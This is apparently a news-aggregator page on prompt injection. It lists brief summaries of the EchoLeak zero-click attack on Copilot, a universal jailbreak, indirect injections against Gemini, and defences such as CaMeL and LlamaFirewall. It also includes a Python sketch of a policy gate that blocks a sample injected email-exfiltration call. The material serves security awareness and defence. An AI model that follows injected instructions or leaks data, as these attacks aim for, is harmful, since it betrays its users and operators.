#prompt-injection

from Hackernoon
3 weeks ago

The Prompt Protocol: Why Tomorrow's Security Nightmares Will Be Whispered, Not Coded | HackerNoon

The next shift in cybersecurity is not only about technical exploits but about vulnerabilities that emerge through clever phrasing in conversation with AI systems.
Privacy professionals
#ai
Artificial intelligence
from Techzine Global
1 month ago

Zero-click attack reveals new AI vulnerability

EchoLeak exposes vulnerabilities in AI assistants like Microsoft 365 Copilot through subtle prompt manipulation, representing a shift in cybersecurity attack vectors.
Artificial intelligence
from Ars Technica
3 months ago

Researchers claim breakthrough in fight against AI's frustrating security hole

Prompt injections jeopardize AI systems; Google DeepMind's CaMeL offers a potential solution by treating language models as untrusted components within security frameworks.
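To make the "untrusted component" idea concrete: a minimal sketch, in the spirit of CaMeL's approach but not DeepMind's actual implementation, in which the model's proposed tool calls are parsed as data and only calls allowed by an explicit policy, with type-checked arguments, ever execute. All names here (`ALLOWED_TOOLS`, `execute_untrusted_plan`) are hypothetical.

```python
import json

# Hypothetical tool registry: each tool's expected argument names and types.
ALLOWED_TOOLS = {
    "search_docs": {"query": str},            # read-only, low risk
    "send_email": {"to": str, "body": str},   # high risk: off by default
}

def execute_untrusted_plan(llm_output: str, policy: set) -> list:
    """Treat the LLM's output as untrusted data: parse its proposed tool
    calls and run only those the caller's policy explicitly permits."""
    results = []
    for call in json.loads(llm_output):
        name, args = call["tool"], call["args"]
        schema = ALLOWED_TOOLS.get(name)
        # Block unknown tools and tools outside the caller's policy.
        if schema is None or name not in policy:
            results.append(f"blocked: {name}")
            continue
        # Block calls whose arguments don't match the declared schema.
        if set(args) != set(schema) or not all(
            isinstance(args[k], t) for k, t in schema.items()
        ):
            results.append(f"blocked: {name} (bad args)")
            continue
        results.append(f"ran: {name}")  # real code would dispatch here
    return results

# An injected instruction can make the model *propose* exfiltration,
# but the policy gate refuses to execute it.
plan = json.dumps([
    {"tool": "search_docs", "args": {"query": "quarterly report"}},
    {"tool": "send_email", "args": {"to": "attacker@evil.com", "body": "secrets"}},
])
print(execute_untrusted_plan(plan, policy={"search_docs"}))
```

The point of the pattern is that safety no longer depends on the model resisting the injection, only on the deterministic gate around it.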
#ai-security
from InfoQ
2 months ago
Artificial intelligence

Meta Open Sources LlamaFirewall for AI Agent Combined Protection

from InfoQ
3 months ago
Artificial intelligence

DeepMind Researchers Propose Defense Against LLM Prompt Injection

Google DeepMind's CaMeL effectively neutralizes 67% of prompt injection attacks in LLMs using traditional software security principles.
Artificial intelligence
from Futurism
3 months ago

Researchers Find Easy Way to Jailbreak Every Major AI, From ChatGPT to Claude

A newly discovered jailbreak can manipulate AI models into producing harmful content, exposing vulnerabilities in their safety measures.
Growth hacking
from Ars Technica
4 months ago

Gemini hackers can deliver more potent attacks with a helping hand from... Gemini

Indirect prompt injections, delivered through content the model ingests rather than typed by the user, are an effective method for exploiting large language models.
from Hackernoon
1 year ago

Prompt Injection Is What Happens When AI Trusts Too Easily | HackerNoon

Generative AI is becoming essential in daily life, but it poses significant security threats like prompt injection, in which crafted input manipulates an AI system into ignoring its instructions.